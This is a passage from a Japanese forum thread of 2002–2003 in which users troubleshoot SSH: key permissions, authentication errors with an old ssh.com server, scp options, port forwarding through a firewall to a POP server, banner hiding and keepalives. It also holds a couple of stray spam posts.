>>428 419 さん
~/.ssh/authorized_keys のアクセス許可を、
ユーザ SYSTEM が読めるように変更するとうまくいくとおもいます。
Cygwin でファイルの許可モードを 600 にしてしまうと、
SYSTEM に対するアクセス許可のエントリがなくなってしまうようです。

430 :406:02/11/17 20:17
>>403
> RhostsRSAAuthenticationは公開鍵認証が必要なため、
> hosts.equivだけの認証を使いたかったので
> プロトコル1のRhostsAuthenticationを選択したのですが…

> ファイアーウォール内の計算サーバにアクセスする
> バックエンド計算ホスト100台超からの認証。ただしrコマンド不可
> こんなところです(^^;

単にknown_hostsファイルを作るのが面倒なだけか?
だったら、ssh-keyscanを使えばよろし。
# ssh-keyscan -t dsa -f /etc/ssh/shosts.equiv > /etc/ssh/ssh_known_hosts

431 :419:02/11/17 20:40
>>429
本当だ…。前に Unix 同士でこのパーミッションが 644 になってたから
失敗したから気をつけていたら、それが仇になるとは…。

ありがとうございました。

432 :403:02/11/19 19:22
>>430
ssh-keyscanは知りませんでした。勉強になります。

>単にknown_hostsファイルを作るのが面倒なだけか?
ではなくて、100台超のマシンから一斉に繰り返しsshでアクセスしてると
sshdが反応しなくなってしまうので、RSA認証を省けばこの問題がクリアできるかと
思ったのですが。


433 :名無しさん@お腹いっぱい。:02/11/19 19:33
>>432
tty (だっけ?) の数が足りてないんでないの?

434 :名無しさん@お腹いっぱい。:02/11/19 22:08
>>432
もしくはsshd_configのMaxStartupsをいじるとか。

435 :名無しさん@お腹いっぱい。:02/11/19 22:11
>>432
どうやって RSA 認証の問題だってわかったの?

436 :名無しさん@お腹いっぱい。:02/11/19 22:37
>435
明確な根拠があるようならばこんなところで聞いていないと思われ

437 :62:02/11/21 19:57
外出先のラップトップPC(win)のファイルを自宅のサーバー(linux, DDNS 利用)にインターネット経由で定期的にバックアップしたいと思っています。
cygwin をつかって、

1.rsync を ssh 経由で利用する
http://www2.i-e-c.co.jp/ssh6.html

2.これを cron でまわす
http://pcweb.mycom.co.jp/special/2002/cygwin/09.html

でできそうな気がするんですが、問題はパスワード入力です。
ssh-agent を立てればノーパスワードで可能、
と言うことなのですが、よくわかりません。
どうしたらいいか教えてください。


438 :名無しさん@お腹いっぱい。:02/11/21 19:59
>>437
> どうしたらいいか教えてください。
ぐぐる。

439 :403:02/11/21 20:12
>>435
ログを見るとlibpwdb.so.0が開けなくてこけているらしいので、
とりあえずホスト名だけの認証にすればいいのかなと思った次第です。
特にRSAって分ったわけではないですね…(^^;

440 :名無しさん@お腹いっぱい。:02/11/22 00:04
>>437
パスフレーズなしの公開鍵認証を使う。

ここも参考にすれ。
http://www.jp.FreeBSD.org/QandA/HTML/2255.html

441 :名無しさん@お腹いっぱい。:02/11/22 04:27
>>403
soが開けないって、1台から接続したときはきちんと動いてるんだよね?
だとするとファイルの開きすぎとか。

そしてなぜr系コマンド不可?
High Performance Computingを甘くみすぎてないか?
そもそも100台からいっせいに1台へ接続なんてHPCクラスタでも普通やらない。

http://ganglia.sourceforge.net/
のpre-2.5.0に入ってるgexec+authdならRSA認証で1000ノード以上でも大丈夫・・・らしい。
モニタリングの方しかいじったことないからよく知らないけど。

442 : :02/11/26 23:50
ttp://www.ayera.com/teraterm/
TeraTerm Pro Web 3.1.1 - Enhanced Telnet/SSH2 Client

不安定じゃありませんか? 日本語処理はさすが TeraTerm と言う感じですが
私の場合、 3000行くらいのファイルを読んだり、貼り付けたりすると毎回のようにフリーズします。
同じような症状の方いらっしゃいませんか?

443 :232:02/11/27 02:36
>>442
漏れと同じような現象かな?

444 :名無しさん@お腹いっぱい。:02/12/04 18:44
>>442
が〜ん、公開鍵暗号による認証ができないじゃないかよぅ。グスン

445 :名無しさん@お腹いっぱい。:02/12/04 19:31
ssh.com版がいつのまにか3.2.2になってた。


446 :初期不良:02/12/05 00:20
>>444
pagent.exe から取ってきてくれるらしいよ

447 :名無しさん@お腹いっぱい。:02/12/05 09:07
>>446
あ、それ、PuTTY の話ですね。

PuTTY also includes pscp.exe, a secure copy program,
plink.exe, a command line interface to PuTTY backends and
pagent.exe, an SSH authentication agent for PuTTY, PSCP and Plink.
It does not include a counterpart for the newer sftp program
that is available on current SSH releases on UNIX systems.

TeraTerm Pro Web じゃ、無理ですか?

448 :bloom:02/12/05 09:10

http://www.agemasukudasai.com/bloom/

449 :名無しさん@お腹いっぱい。:02/12/06 02:24
>447
唐突にPuTTYの話を持ち出すわけ無いだろ・・・

450 :名無しさん@お腹いっぱい。:02/12/09 18:13
Authenticated with partial success.
Permission denied ().

と言われてログインできなくなってしまったんですけど、
どうすれば解決できるでしょうか?

ちなみにクライアントは linux の ssh で version 3.4 です。
windows の teraterm + ttssh からはログインできるんですけど。

一介の一般ユーザなのでサーバのほうはいじれません。


451 :名無しさん@お腹いっぱい。:02/12/09 18:16
-v

452 :名無しさん@お腹いっぱい。:02/12/09 18:29
すんません。長いけど貼っつけます。

$ ssh -v xxx.xxx.ac.jp
OpenSSH_3.4p1 Debian 1:3.4p1-1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect: needpriv 0
debug1: Connecting to xxx.xxx.ac.jp [xx.xx.xx.xx] port 22.
debug1: Connection established.
debug1: identity file /home/hoge/.ssh/identity type 0
debug1: identity file /home/hoge/.ssh/id_rsa type 1
debug1: identity file /home/hoge/.ssh/id_dsa type -1
debug1: Remote protocol version 1.99, remote software version 2.0.13 (non-commercial)
debug1: match: 2.0.13 (non-commercial) pat 2.0.13*,2.0.14*,2.0.15*,2.0.16*,2.0.17*,2.0.18*,2.0.19*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client 3des-cbc hmac-md5 none
debug1: kex: client->server 3des-cbc hmac-md5 none
debug1: dh_gen_key: priv key bits set: 187/384
debug1: bits set: 557/1024
debug1: sending SSH2_MSG_KEXDH_INIT
debug1: expecting SSH2_MSG_KEXDH_REPLY


453 :名無しさん@お腹いっぱい。:02/12/09 18:30
つづきです。

debug1: Host 'xxx.xxx.ac.jp' is known and matches the DSA host key.
debug1: Found key in /home/hoge/.ssh/known_hosts:33
debug1: bits set: 496/1024
debug1: ssh_dss_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: buggy server: service_accept w/o service
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue:
debug1: next auth method to try is publickey
debug1: try pubkey: /home/hoge/.ssh/id_rsa
debug1: authentications that can continue:
debug1: try privkey: /home/hoge/.ssh/id_dsa
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue:
debug1: next auth method to try is password


454 :名無しさん@お腹いっぱい。:02/12/09 18:31
最後の入力部分です。

Authenticated with partial success.
debug1: authentications that can continue:
Permission denied, please try again.
Authenticated with partial success.
debug1: authentications that can continue:
Permission denied, please try again.
Authenticated with partial success.
debug1: authentications that can continue:
debug1: no more auth methods to try
Permission denied ().
debug1: Calling cleanup 0x8063a9c(0x0)


455 :初期不良:02/12/09 21:42
>>447
なんか反応がなくて不安なので念のため書いておくと、
TeraTerm3 が pagent.exe から秘密鍵持ってきてくれまつ

456 :名無しさん@Meadow:02/12/09 23:45
>>455
s/pagent/pageant/
ですよね?


457 :名無しさん@お腹いっぱい。:02/12/10 03:19
>456
> s/pagent/pageant/
> ですよね?

(゚Д゚)ハァ?

458 :450=452:02/12/10 13:28
ssh -1 で繋がりました。原因は不明なのですが、
fwが protocol 2 に対応していないとか、
そんなところでしょうか。
うーん、悩ましい…
ちなみに、scp -1 ではまだエラーが出るんです…


459 :名無しさん@XEmacs:02/12/10 14:18
>>458
> ssh -1 で繋がりました。

ttssh で繋がるならそうでしょう。そもそも Authenticated with
partial success.というメッセージが出るのは protocol 2 だけなの
で。ちなみに、このメッセージは sshd2_config で requiredAuthentications
に複数の method が指定されている場合、そのうちの一つに成功した
(かつまだ他に受けるべき method が残っている) ときに出ます。

> 原因は不明なのですが、
> fwが protocol 2 に対応していないとか、
> そんなところでしょうか。

いや、間違いなく sshd2 と会話が出来ているのでそういう問題ではな
いと思う。サーバはいじれないってことだけど、

>>debug1: Remote protocol version 1.99, remote software version 2.0.13 (non-commercial)
>>debug1: buggy server: service_accept w/o service
>>debug1: authentications that can continue:

バージョンが古いし、buggy server なんて言われてるし、使える
authentication method のリストは出てないし、と、サーバ側が怪し
いところだらけなので、そっちの問題じゃないかいな。まぁ、
protocol 1 で我慢できるならそれでもよいか。

> ちなみに、scp -1 ではまだエラーが出るんです…

ちなみに、scp には -1 ってオプションはない。だもんで、scp では
-o オプションで渡すか、もしくは ssh_config で設定するか、なん
だわな。


460 :450=452=458:02/12/10 17:26
>>459
> いや、間違いなく sshd2 と会話が出来ているのでそういう問題ではな
> いと思う。

たしかにそうなんですが、たとえばYahoo!BBからアクセスするときは
protocol 2 でも何の問題もないんです。ところが、会社内部からだと前記の
問題が出るんです。だもんで会社のfwの問題なのかと。

> ちなみに、scp には -1 ってオプションはない。だもんで、scp では

うーん、man には
-1 Forces scp to try protocol version 1 only.
とあるんですけど…

ちなみに、scp -1 を実行すると、パスワードは受け付けてくれるのですが、
warning: Executing scp1 compatibility.
Executing ssh1 in compatibility mode failed.
で終ってしまいます。


461 :名無しさん@XEmacs:02/12/10 18:17
>>460
> たしかにそうなんですが、たとえばYahoo!BBからアクセスするときは
> protocol 2 でも何の問題もないんです。ところが、会社内部からだと前記の
> 問題が出るんです。だもんで会社のfwの問題なのかと。

たしかに変な挙動ですが、firewall が関係してるとも思えないなぁ。
Yahoo!BB から使うときと会社から使うときで client の環境は一緒な
の?

> うーん、man には
> -1 Forces scp to try protocol version 1 only.
> とあるんですけど…

そりは ssh.com 版の scp じゃないすか。

> warning: Executing scp1 compatibility.
> Executing ssh1 in compatibility mode failed.

というのも ssh.com 版の挙動っぽいし。だとすると、

>>450
> ちなみにクライアントは linux の ssh で version 3.4 です。

と言ってたのと矛盾してるんで、なんか client の環境も変かも。ど
のバージョンの ssh/scp が使われているのか確かめるべし。


462 :名無しさん@お腹いっぱい。:02/12/10 18:31
>>461
> Yahoo!BB から使うときと会社から使うときで client の環境は一緒な
> の?

まったく一緒です。ただ、Yahoo!BBではDHCPですが、会社では固定IPです。

> そりは ssh.com 版の scp じゃないすか。

> と言ってたのと矛盾してるんで、なんか client の環境も変かも。ど
> のバージョンの ssh/scp が使われているのか確かめるべし。

Debian で ssh package を入れたんですけど…

$ ssh -V
OpenSSH_3.4p1 Debian 1:3.4p1-1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f

scp も同じ ssh package に付属するやつです。version の確認方法がわかり
ませんが。


463 :名無しさん@XEmacs:02/12/10 20:00
>>462
> Debian で ssh package を入れたんですけど…

debian の openssh patch を見てみたら、たしかに scp が -[12] オ
プションを受け付けるように修正されるのね。うーむ、そんなことま
でやってくれやがるのか、debian は。

> scp も同じ ssh package に付属するやつです。version の確認方法がわかり
> ませんが。

scp -v とかで実際に動かしてみればある程度分かる。しかし、

>>461
> > warning: Executing scp1 compatibility.
> > Executing ssh1 in compatibility mode failed.

というような変更までは debian の patch もやってないしなぁ。とか
書いてたら気がついた。scp を起動すると、サーバ側でも scp プログ
ラムを呼ぶようになってるんで、こいつはサーバ側の ssh.com 版
scp が出してるメッセージって可能性はあるか。

だとすればやっぱサーバ側に手を入れてもらわないとどうしようもな
さそう。


464 :名無しさん@お腹いっぱい。:02/12/10 20:31
> >>462
> だとすればやっぱサーバ側に手を入れてもらわないとどうしようもな

サーバ側の /etc/sshd_config なら見ることができます。文句も言えるとは思
うんですが何て言えばいいですかね? (もうほぼ部外の人間なのでそう簡単
に対処してくれるとは思えませんけれど)


465 :名無しさん@お腹いっぱい。:02/12/10 22:59
>>464
>>450には
| Authenticated with partial success.
| Permission denied ().
| と言われてログインできなくなってしまったんですけど、
| どうすれば解決できるでしょうか?

と書いてあるますが、以前はできてたんですか?
だとすれば、それからいままでの間のserver/client双方の変更を
元に戻すことは可能ですか?


466 :464:02/12/10 23:11
>>465
> 以前はできてたんですか?

できてました。というか、今でも会社以外からはできています。

> だとすれば、それからいままでの間のserver/client双方の変更を
> 元に戻すことは可能ですか?

サーバはいじれないからわからないですが、クライアントの ssh 関係はいじっ
てません。問題は設定の変更ではなくてネットワーク環境の変化だと思います。


467 :464:02/12/10 23:16
>>463
> こいつはサーバ側の ssh.com 版 scp が出してるメッセージって可能性はあるか。

サーバで man ssh したらこんなん出ました。
AUTHORS SSH Communications Security Ltd. For more information, see
http://www.ssh.fi.

> ssh -V
ssh: SSH Version 2.0.13


468 :名無しさん@お腹いっぱい。:02/12/10 23:23
会社のfwでモニタされてるとか。サーバキーチェックした?

469 :名無しさん@XEmacs:02/12/10 23:24
>>464
> サーバ側の /etc/sshd_config なら見ることができます。文句も言えるとは思
> うんですが何て言えばいいですかね?

OpenSSH 入れろや(゚Д゚)ゴルァ。

ssh.com 版のままでも、新しいの (3.X) に変えれば直るんじゃないか
とは思うけど。

ただ、ssh.com に protocol 1 をサポートさせるためには 1.2.X もイ
ンストールしなきゃならない。


470 :464:02/12/10 23:50
>>468
> 会社のfwでモニタされてるとか。サーバキーチェックした?

やっぱfw関係ありますか? サーバキーのチェック方法がわかりません。
できれば会社のネットワーク管理者にはあまり関わりあいたくないのですが。


471 :名無しさん@お腹いっぱい。:02/12/14 18:35
UDPをフォワーディングしたいんですが、どっかにパッチないですか?

472 :名無しさん@お腹いっぱい。:02/12/14 19:03
>>471
netcatで。


473 :名無しさん@お腹いっぱい。:02/12/14 20:03
なるほど。TCPの重さを嫌ったんだけど両端で変換しちまえばいいのか…
つかsshチャンネル上をTCPがそのまま通るわけじゃないから余計な心配だったようです。
経験値アップしました。サンクス

474 :名無しさん@お腹いっぱい。:02/12/16 12:52
皆さんは公開鍵を、どうやってホストへ登録してもらってますか?

ホスト側では
PasswordAuthentication no
ChallengeResponseAuthentication no
となっています。


475 :名無しさん@お腹いっぱい。:02/12/16 16:34
教えて君でスマン。
sshで別の計算機にログインしたとき
現在の計算機のカレントディレクトリを保持したままログインするには
どうすればいいですか?

476 :名無しさん@XEmacs:02/12/16 17:38
>>475
> sshで別の計算機にログインしたとき
> 現在の計算機のカレントディレクトリを保持したままログインするには

『カレントディレクトリを保持したまま』の意味がいまいちよくつか
めないんだけど、local と同じ path が remote にもあってそこに
cd した上で作業したいってことかしら?

だとすれば、

$ ssh -t remote "cd `pwd`; /path/to/loginshell/in/remote"

なんて手はある。shell の path も両マシンで共通なら

$ ssh -t remote "cd `pwd`; $SHELL"

でも可。


477 :475:02/12/16 19:09
できました。
教えてくれてどうもです。

478 :名無しさん@お腹いっぱい。:02/12/17 16:24
PuTTYのスレで知ったのだけど、SSHv2に脆弱性が発見されているね。
CERTとrapid7の発表とで、脆弱性の影響を受けるバージョンが違うんだけど...。

ssh-3.2.2がアウトだと、入れ替え相当面倒くさいなぁ・・・。


479 :名無しさん@お腹いっぱい。:02/12/17 21:19
OpenSSHはセーフだったか

480 :名無しさん@お腹いっぱい。:02/12/18 02:32
やっぱりssh-3.2.2アウトらすぃ。鬱だ...。

481 :名無しさん@お腹いっぱい。:02/12/19 14:28
http://www.ssh.com/company/newsroom/article/303/
ssh.com はDoS以外、大丈夫とのアナウンスが出た。
CERTも18日付けで更新されている。


482 :名無しさん@お腹いっぱい。:02/12/23 16:58
ポートフォワーディングして、telnetでlocahostのそのポートにアクセスしよ
うとすると、

channel 2: open failed: connect failed: Connection refused

というエラーで終了してしまうんですけど、どうやったらアクセスできるよう
になるでしょうか? 具体的にはfirewallを越えてPOPのフォワーディングを
しようとしています。


483 :名無しさん@お腹いっぱい。:02/12/23 17:37
>>482
port forward するときのコマンドライン晒せや。

484 :482:02/12/23 18:20
XXXからYYYを介してpopサーバへの接続を試みています。

XXX$ ssh localhost -L 20110:YYY.YY.YY.jp:10110

一方、YYYでは

YYY$ ssh localhost -L 10110:pop.YY.YY.jp:110

としています。YYYからは

YYY$ telnet localhost 10110

でpopサーバとお話できるんですけど、XXXからだと

XXX$ telnet localhost 20110

はすぐにクローズされてしまいます。


485 :名無しさん@お腹いっぱい。:02/12/23 18:43
>>484
なぜlocalhostにログインしてるの?
local-firewall-server
の形でforwardしたいなら
lcoal$ ssh firewall -L 10110:server:110
じゃないの?

>>484の方法でやるなら -g オプションが必要だけど、
セキュリティホールになりうるからお勧めできない。

486 :名無しさん@お腹いっぱい。:02/12/23 18:46
ああ、全経路を暗号化したいのか。
なら

local$ ssh firewall -L 20110:server:10110

firewall$ ssh server -L 10110:server:110

かな。

487 :名無しさん@お腹いっぱい。:02/12/23 18:46
違った。

local$ ssh firewall -L 20110:firewall:10110
firewall$ ssh server -L 10110:server:110


488 :482:02/12/23 19:17
いちおうあの方法は管理者側の指示のようです。
popserverにはメール・アカウントしかないようでして、

firewall$ ssh server -L 10110:server:110

ではログインできません。


489 :名無しさん@お腹いっぱい。:02/12/23 19:25
>>488
管理者がナニ考えているのか知らないけど、
>>484じゃlocal-firewall間が暗号化されていないよ。ssh使う意味無し。

serverにログインアカウント無いなら>>485を試してみて。
(ただし、この方法はfirewall-server間は暗号化されない)

490 :482:02/12/23 21:48
>>489
-gで繋がりました。ありがとうございました。

後学のために、この-gがないと繋がらない理由と、これがセキュリティホール
になる仕組みを教えていただけると嬉しいです。


491 :名無しさん@お腹いっぱい。:02/12/23 21:57

もうちょっとでクリスマス。。★彡
パートナーは見つかりました?(o^.^o)

http://petitmomo.com/mm/
ここがちょっぴりエッチ系のめぐが運営している出会いサイトです。
もしよかったら使ってみて、、、
ヨロシクです。

めぐ(^o^)-☆


492 :名無しさん@お腹いっぱい。:02/12/23 22:05
>>490
マニュアル嫁。それでわからんかったら -g 使うの禁止。

493 :名無しさん@お腹いっぱい。:02/12/24 01:04
>>490
-g オプション無しだと port forward で listen した port は localhost しか接続を許可しない。
>>484で外からアクセスして弾かれているので分かる。

-g オプションつけると port forward で listen した port への接続を無差別に許可する。
せっかく管理者がサーバーを firewall 内においているのに、外からアクセスする手段を与えてしまう。
悪意のある人がこれに気づくと DoS 程度は容易に行えるし、
管理者がサーバーソフトのアップデートを怠っていると最悪の場合 crack される可能性がある。

なので、 -g オプションの動作がよくわかっていなければ使ってはならない。
-g 付けるほうじゃなく、こっちを試してみて。
local$ ssh firewall -L 10110:server:110


494 :482:02/12/24 01:18
>>493
うう、ご丁寧にありがとうございます。これでも通りました。


495 :名無しさん@お腹いっぱい。:02/12/26 16:16
SSHのバナーを変える(消す)のってどうやるの?
SSH2だとBANNERっていうパラメータがsshd_configにあるみたいだけど、
SSH1だと使えないですか?

496 :名無しさん@XEmacs:02/12/26 17:52
>>495
> SSHのバナーを変える(消す)のってどうやるの?

何を指してバナーと呼んでいる?

> SSH2だとBANNERっていうパラメータがsshd_configにあるみたいだけど、

この Banner という config option は設定すると

local$ slogin remote
逝ってよし
Last login: Thu Dec 26 17:42:38 2002 from *****.*******.***
remote$

てな感じで遊べる、というだけの代物で、デフォルトでは設定されちゃ
いないからあえて消す必要はない筈なんだが。


497 :名無しさん@お腹いっぱい。:02/12/26 18:08
>>496
TCP/22をtelnetで叩くとSSHとOSのバージョンが出てきます。
これが気持ち悪いので消したいのですが。


498 :名無しさん@XEmacs:02/12/26 18:46
>>497
> TCP/22をtelnetで叩くとSSHとOSのバージョンが出てきます。

正しくは SSH Protocol と Software のバージョン、ね。

♯ま、OS のバージョンまで入れてる variant がないとは言えないだ
♯ろけど。

> これが気持ち悪いので消したいのですが。

server/client 間のネゴに必要な情報なので消しちゃダメだし、ソー
スいじって recompile でもしない限りは変えられない。


499 :名無しさん@お腹いっぱい。:02/12/27 00:18
>>498
>server/client 間のネゴに必要な情報なので消しちゃダメだし、
あ、これ見てるのか。じゃ消しちゃダメですね。

ちなみにうちではこう表示されてます。
>SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702

500 :名無しさん@お腹いっぱい。:02/12/27 01:08
>>498
>>499
ソースいじってそれ(>>499の例では「OpenSSH_3.4p1 FreeBSD-20020702」の部
分)を消し、recompile すると正常に動作しなくなったとかいう話がどっかの雑誌
に載ってたような気がします。
# これに関しては
#  http://www.openssh.com/txt/draft-ietf-secsh-transport-14.txt
# の「3.2 Protocol Version Exchange」に書かれてますな…過去のバージョンと
# の兼ね合いのために存在するっぽい?

ちなみに、>>499の例でいう「SSH-1.99」の部分はどのバージョンのSSHプロトコル
で通信する(orできる)かを相手に伝えるためのもの。消すと一切通信できなくなり
ます(藁)
# >>497(=>>499)氏はクラッカー共に余計な情報を渡したくないと思ったのかな。


501 :497:02/12/27 07:12
>>500
># の「3.2 Protocol Version Exchange」に書かれてますな…過去のバージョンと
># の兼ね合いのために存在するっぽい?
RFCに書いてあるんじゃしょうがないですね。

># >>497(=>>499)氏はクラッカー共に余計な情報を渡したくないと思ったのかな。
そうなんですが。
ラッパーではじいたIPからつないでも、この文字列だけは出てきちゃうんです。


502 :名無しさん@お腹いっぱい。:02/12/27 07:43
>>501
> ラッパーではじいたIPからつないでも、この文字列だけは出てきちゃうんです。
「ラッパーで」って具体的に何よ? TCP Wrapperか??
あと、「はじいた」つもりでも実際ははじかれていないような気も…

503 :名無しさん@お腹いっぱい。:02/12/27 07:45
>>501
そんなに嫌がるならパケットをフィルタしちゃえば。
ラッパーで弾くならフィルタリングも出来るよね。


504 :503:02/12/27 07:49
>>502
なんか台無しにするようなコメントになってしまったか。すまそ。


505 :502:02/12/27 08:03
「はじく」=「TCP Wrapperなどでアクセス制限をかける」と考えてたんだが、
もしそうなら>>501の「この文字列だけは出てきちゃうんです」が意味不明。
 →実はアクセス制限がかかっていなかった(はじかれてなかった)、というオチか?

% telnet サーバのホスト名 22
してその文字列が表示されるってことかい?>>501

>>501氏の「はじく」ってまた別の意味か??

>>503 (゚∀゚)キニスルナ

506 :502=505:02/12/27 08:07
>>505
> % telnet サーバのホスト名 22
> してその文字列が表示されるってことかい?>>501

スマソ、>>497に書いてあったね。鬱氏

507 :名無しさん@お腹いっぱい。:02/12/27 09:57
>>501
sshdをinetdから起動するようにすると、
libwrapではじかれたとき、何も出ないようになりませんか。

508 :名無しさん@お腹いっぱい。:02/12/27 10:16
>>507
inetd から起動しなくても
libwrap ではじかれると何も出ないね。

509 :495=497=499=501:02/12/27 10:32
>>502 >>505
TCP Wrapperでアクセス制限しています。
lddで確認したらlibwrapにリンクしてましたし、
実際、拒否IPからsshでつなぎにいくと弾かれます。

で、同じく拒否IPから-vオプション付けて試してみたら、

debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect needpriv 0
debug1: Connecting to xxx.xxx.xxx.xxx [xxx.xxx.xxx.xxx] port 22.
debug1: Connection established.
debug1: identity file /home/hoge/.ssh/identity type 0
ssh_exchange_identification: Connection closed by remote host

と、コネクションを張った後(つまりバージョンネゴシエーション
が完了した後?)、認証を始める段階になって弾かれているようでした。

常駐daemonの場合、inetdからの起動と違ってサーバプロセスの
起動自体を制限してるわけではないから、というのがビンゴでしょうか?

>>503
>そんなに嫌がるならパケットをフィルタしちゃえば。
>ラッパーで弾くならフィルタリングも出来るよね。
なわけで素直にフィルタかけようと思います。
お世話様でした。



510 :495=497=499=501=509:02/12/27 10:39
>>508
>inetd から起動しなくても
>libwrap ではじかれると何も出ないね。
え、そうなんですか。
ひょっとして変なソース掴まされてるとか (((;゚Д゚))ガクガクブルブル


511 :名無しさん@XEmacs:02/12/27 15:52
♯昨夜試しに Banner option 設定したのを忘れて、今朝よそからログ
♯インしたらいきなりマシンに『逝ってよし』と言われて激しく鬱。

>>509
> で、同じく拒否IPから-vオプション付けて試してみたら、
> <snip>
> と、コネクションを張った後(つまりバージョンネゴシエーション
> が完了した後?)、認証を始める段階になって弾かれているようでした。

上で言ってる Connection established. は TCP レベルでのコネクショ
ンのことなので SSH レベルでのバージョンネゴはまだその先。

で、sshd のソースを見る限りでは、LIBWRAP が有効な場合 TCP コネ
クション確立とバージョンネゴの間で切断されるようになってるから、
サーバのバージョンは表示されない筈。やっぱなんか動きが変かも。

手元のソースは OpenBSD のなんで、FreeBSD だとその辺が違ってる可
能性はあるかもしれんが…。


512 :名無しさん@お腹いっぱい。:02/12/27 17:08
>>509
> TCP Wrapperでアクセス制限しています。
どんなふうに?

513 :509:02/12/27 17:17
sshdをいったん殺して再起動したら表示されなくなりました。
HUPシグナルじゃだめだったんでしょうか。

激しく当たり前だったらごめんなさい。回線切って首吊ってきます。

514 :名無しさん@XEmacs:02/12/27 18:32
>>513
> sshdをいったん殺して再起動したら表示されなくなりました。
> HUPシグナルじゃだめだったんでしょうか。

うんにゃ。HUP シグナルを送るのは sshd を再起動するのとまったく
同じ効果がある (というか HUP が送られたときに行なわれる処理は再
起動そのもの。see sshd(8))。

あと、単に /etc/hosts.deny に新しくホストを追加するくらいなら別
に再起動 (したり HUP シグナルを送ったり) する必要はない。

> 激しく当たり前だったらごめんなさい。回線切って首吊ってきます。

つーこって、吊るこたぁないが、なにか間違ってたのもたしかなんだ
ろうなぁ、きっと。


515 :名無しさん@お腹いっぱい。:02/12/29 16:31
くそ厨房質問で申し訳ないのですが…

client---<ssh可能>---hostA
hostA---<大体のポートが開いている>---www
といった構成で、clientからhostAにsshかけて外部へパケットを飛ばすことを考えています。
localhostのポートをhostAのポートにフォワーディングすればいいのかな?
と思って、とりあえず8080を80に、とかやってみたんですけど、
転送要求が拒否されたとか言われました。
これは、考えが間違っているんでしょうか、それともhostAの方で塞がれているんでしょうか?
アドバイスお願いいたします。

516 :名無しさん@お腹いっぱい。:02/12/29 16:42
>>515
もっと具体的に書け。


517 :515:02/12/29 16:57
細かいhost名とかは晒せませんが…
とりあえずteratermproで実験してみました。
ssh転送で、localhostの8080をhostAの80に飛ばして、
IEのproxyでlocalhost:8080をproxyに指定。…だめでした。(転送要求が拒否されたと出る。)
といったかんじなのですが。

#普段mozillaしか使っていないので嫌われたか?(ぉぃ

518 :名無しさん@お腹いっぱい。:02/12/29 17:05
hostA:80 では何が動いてるのですか?

519 :名無しさん@お腹いっぱい。:02/12/29 17:55
>>517
そりゃそうだろ。hostA:80にproxyとしての要求を出しているんだから。


520 :515:02/12/29 18:01
>>518
何といわれても…デーモンとかのことですか?

>>519
あ、やっぱりですか。でも、今ひとつ何をすればいいのかわからんのです。

むぅ…はぁ〜さっぱりさっぱり。

521 :名無しさん@お腹いっぱい。:02/12/29 18:19
>>515
目的は何なのよ。

522 :名無しさん@お腹いっぱい。:02/12/30 01:23
>>515

hostA で delegate とか動かす必要があるのでは?



523 :名無しさん@お腹いっぱい。:02/12/30 02:14
client% ssh hostA -L 8080:www:80
して、ブラウザ側で
http://localhost:8080/
かな。

524 :523:02/12/30 02:19
ん、TeraTermか。
hostAにログインしておいて"SSH Port Forwarding"のところで、
 Forward local port: [8080]
 to remote machine: [www] port: [80]
これでどーよ。

525 :515:02/12/30 14:49
質問していながら申し訳ありません、
これからIPunreachableな田舎へ引っ込むため、
年明けにでももう一度考え直してみます。
返信ありがとうございました。

526 :名無しさん@お腹いっぱい。:03/01/02 13:57
cliantからhostにsshで入って、terminalにコマンドをしばらく
打たないでいると、自然に接続が切れるのですが、どうすれば、
切れないようにできるのでしょうか?

527 :名無しさん@XEmacs:03/01/02 15:24
>>526
> cliantからhostにsshで入って、terminalにコマンドをしばらく
> 打たないでいると、自然に接続が切れるのですが、どうすれば、
> 切れないようにできるのでしょうか?

・たぶん間に挟まってる NAT/NAPT 機器の変換表保持時間を長くする。
・sshd_config で ClientAliveInterval を適当な時間に設定 (ただし
 SSH2 Only)

のどっちか。


528 :名無しさん@お腹いっぱい。:03/01/02 15:38
sshdに空パケット投げるパッチ当ててみたら?


529 :名無しさん@お腹いっぱい。:03/01/02 16:21
X11 forwarding って何すか?
slogin して X client を立ちあげるのとは違うんですか?

530 :名無しさん@お腹いっぱい。:03/01/02 17:36
>>527, >>528
ありがとうございます。SUN sshがhostなんで、
ClientAliveIntervalが設定できないみたいです。
でも、勉強になりました・・。OpenSSHにするという手もありますね。

531 :名無しさん@お腹いっぱい。:03/01/02 17:51
>>529

簡単に言うと、port forward + X認証 ってとこじゃなったかな?多分。

532 :名無しさん@XEmacs:03/01/02 18:05
>>530
> ClientAliveIntervalが設定できないみたいです。

sshd に依存しない (けどすんごい野蛮な) 手として

while true; do
echo -n .
sleep 180
done &

とかいうのを login した先で走らせとく、なんてのもある。

♯これなら SSH1 でも動くから、SSH2 に移行して ClientAliveInterval
♯を知るまでは実際に使ってたことも。

533 :529:03/01/02 19:30
>>531
解説ありがとう。
しかし勉強不足のせいで何のことだか
わかりませんでした。勉強します。
スマソ。

534 :名無しさん@お腹いっぱい。:03/01/04 05:42
ssh の port forwarding で pop に接続するということは、
その pop server に sshd がインストールされていることを
前提にしている訳ですよね。
自宅サーバとか学校のサーバではない、
普通の商用プロバイダでも sshd は
用意されているものなんでしょうか。

ちなみに私は biglobe です。
実際に試してみようかとも思ったんですけど、
port scan と間違われるといけないので。

535 :名無しさん@お腹いっぱい。:03/01/04 05:47
>>534
普通は無い。

536 :名無しさん@お腹いっぱい。:03/01/04 05:58
ssh使いたいってことは途中の経路でパスワードや内容を見られたくないってことかな?
パスワードの暗号化にはAPOPがあるし、内容の暗号化にはPGPがある。

